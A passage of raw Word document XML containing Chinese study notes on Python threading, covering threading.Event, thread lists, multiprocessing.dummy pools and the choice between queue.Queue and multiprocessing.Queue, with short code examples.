        </w:rPr>
        <w:t>使用有界信号量能减少这种编程错误：信号量的释放次数多于其请求次数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083F96C0" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRPr="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58BDC0E4" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D9D651B" w14:textId="509CBB6B" w:rsidR="004A4711" w:rsidRDefault="004A4711" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="551" w:name="_Toc159779984"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>线程通信</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Event</w:t>
      </w:r>
      <w:bookmarkEnd w:id="551"/>
    </w:p>
    <w:p w14:paraId="7E1639C5" w14:textId="77777777" w:rsidR="004A4711" w:rsidRDefault="004A4711" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F553D3C" w14:textId="2005227D" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF5D95">
        <w:t>https://docs.python.org/zh-cn/3/library/threading.html#semaphore-objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BE7AE5" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRPr="004A4711" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A04BA27" w14:textId="7584FD55" w:rsidR="004A4711" w:rsidRDefault="004A4711" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> threading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8EB21A" w14:textId="77777777" w:rsidR="004A4711" w:rsidRPr="004A4711" w:rsidRDefault="004A4711" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67146502" w14:textId="7E4319F6" w:rsidR="004A4711" w:rsidRDefault="004A4711" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A4164B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00A4164B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>vent = threading.Event()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AE5250" w14:textId="77777777" w:rsidR="004A4711" w:rsidRDefault="004A4711" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0726473C" w14:textId="6C70D96F" w:rsidR="004A4711" w:rsidRDefault="004A4711" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>ef func():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EF1F59" w14:textId="038C0B96" w:rsidR="004A4711" w:rsidRDefault="004A4711" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等待事件，进入等待阻塞状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1064E729" w14:textId="453138FC" w:rsidR="004A4711" w:rsidRDefault="004A4711" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>print(threading.currentThread().getName())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5E394E" w14:textId="2C597B77" w:rsidR="004A4711" w:rsidRDefault="004A4711" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A4164B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>event.wait()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2676F5CC" w14:textId="1A6CCC9F" w:rsidR="004A4711" w:rsidRDefault="004A4711" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收到事件后进入运行状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3BF803" w14:textId="6C1DFE4E" w:rsidR="004A4711" w:rsidRDefault="004A4711" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>print(threading.currentThread().getName())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D192F6" w14:textId="77777777" w:rsidR="004A4711" w:rsidRDefault="004A4711" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E4D71EA" w14:textId="07C6CEF9" w:rsidR="004A4711" w:rsidRDefault="00502EB2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>1 = threading.Thread(target=func)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FEFE3F" w14:textId="76855872" w:rsidR="00502EB2" w:rsidRDefault="00502EB2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>2 = threading.Thread(target=func)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702D4263" w14:textId="41A94031" w:rsidR="004A4711" w:rsidRDefault="00502EB2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>t1.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3315500D" w14:textId="463B22A6" w:rsidR="00502EB2" w:rsidRDefault="00502EB2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>2.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E68C467" w14:textId="41E0522C" w:rsidR="00502EB2" w:rsidRPr="000A411B" w:rsidRDefault="00502EB2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>ime.sleep(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5992A978" w14:textId="77777777" w:rsidR="00502EB2" w:rsidRDefault="00502EB2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39E630FD" w14:textId="0D4F8BC0" w:rsidR="00502EB2" w:rsidRDefault="00502EB2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发送事件通知</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019D2CDA" w14:textId="4D0C718C" w:rsidR="00502EB2" w:rsidRDefault="00502EB2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>event</w:t>
      </w:r>
      <w:r>
        <w:t>.set()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73361FF4" w14:textId="77777777" w:rsidR="00502EB2" w:rsidRPr="00DC5342" w:rsidRDefault="00502EB2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F4E0C85" w14:textId="77777777" w:rsidR="00502EB2" w:rsidRPr="009D42A6" w:rsidRDefault="00502EB2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DDB609C" w14:textId="77777777" w:rsidR="00502EB2" w:rsidRDefault="00502EB2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0526B902" w14:textId="77777777" w:rsidR="00502EB2" w:rsidRPr="00412E5D" w:rsidRDefault="00502EB2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="513ABAD9" w14:textId="77777777" w:rsidR="00502EB2" w:rsidRDefault="00502EB2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="635470C9" w14:textId="77777777" w:rsidR="00502EB2" w:rsidRDefault="00502EB2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55799B59" w14:textId="77777777" w:rsidR="00502EB2" w:rsidRDefault="00502EB2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47309111" w14:textId="77777777" w:rsidR="00502EB2" w:rsidRDefault="00502EB2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F7494DE" w14:textId="77777777" w:rsidR="00502EB2" w:rsidRDefault="00502EB2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FAB3C44" w14:textId="77777777" w:rsidR="00502EB2" w:rsidRDefault="00502EB2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="136A25F1" w14:textId="77777777" w:rsidR="00502EB2" w:rsidRPr="00502EB2" w:rsidRDefault="00502EB2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B713E6D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="552" w:name="_Toc159779985"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>threading</w:t>
      </w:r>
      <w:bookmarkEnd w:id="552"/>
    </w:p>
    <w:p w14:paraId="6274A493" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多线程部分</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDA9875" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>import queue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:br/>
        <w:t>import threading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7017A069" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5571C92A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>for single_ScandUrlAndPath in ScandUrlAndPaths:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>threads.append( threading.Thread(target=self.swagger_recognize, args=(q, single_ScandUrlAndPath)) )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093F3531" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>for i in threads:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    i.start()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t>for i in threads:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    i.join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E83F9D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60DD4752" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>多线程的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的函数部分</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2405F41A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>while not q.empty():</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    logger.critical(q.get())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13723EB9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20DCF84E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="553" w:name="_Toc159779986"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>multiprocessing.dummy</w:t>
      </w:r>
      <w:bookmarkEnd w:id="553"/>
    </w:p>
    <w:p w14:paraId="582E8B8C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from multiprocessing.dummy import Pool as DummyPool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAC5114" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下文中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> DummyPool </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指多线程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AF303A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60D9F13E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dummy_pool = DummyPool(20)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2408BF00" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>for i in range(20):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9436EB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    dummy_pool.apply_async(Node_thread_dummy, args=(dummy_pool_queue, ))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170BBFFF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dummy_pool.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D15F65" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dummy_pool.join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534583A7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CD86EF7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0625D6A5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74A83468" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73EF6A05" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42C345EA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="554" w:name="_Toc159779987"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>消息同步</w:t>
      </w:r>
      <w:bookmarkEnd w:id="554"/>
    </w:p>
    <w:p w14:paraId="585E04D6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29EC75FD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>消息同步的队列通常是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>指针</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型，传参直接传入即可，不需要返回、声明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>global</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，因为是指针，大多数情况下不需要管怎么将结果返回给队列的细节。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F772221" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="555" w:name="_Toc159779988"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>普通</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FIFO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>队列</w:t>
      </w:r>
      <w:bookmarkEnd w:id="555"/>
    </w:p>
    <w:p w14:paraId="4865472C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>非多进程的消息队列不可以用于进程间的传参。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70682E23" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>否则会导致两种问题，一种是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未定义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，一种是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多次拷贝相同值的消息队列。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BED5AC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以通常保险一些你可以直接使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">multiprocessing.Queue </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而非</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> queue.Queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F180320" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下代码，使用多线程，但是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Queue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>multiprocessing.Queue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。通过传值正常使用，非多次拷贝。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773C9BB8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2ECB6A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
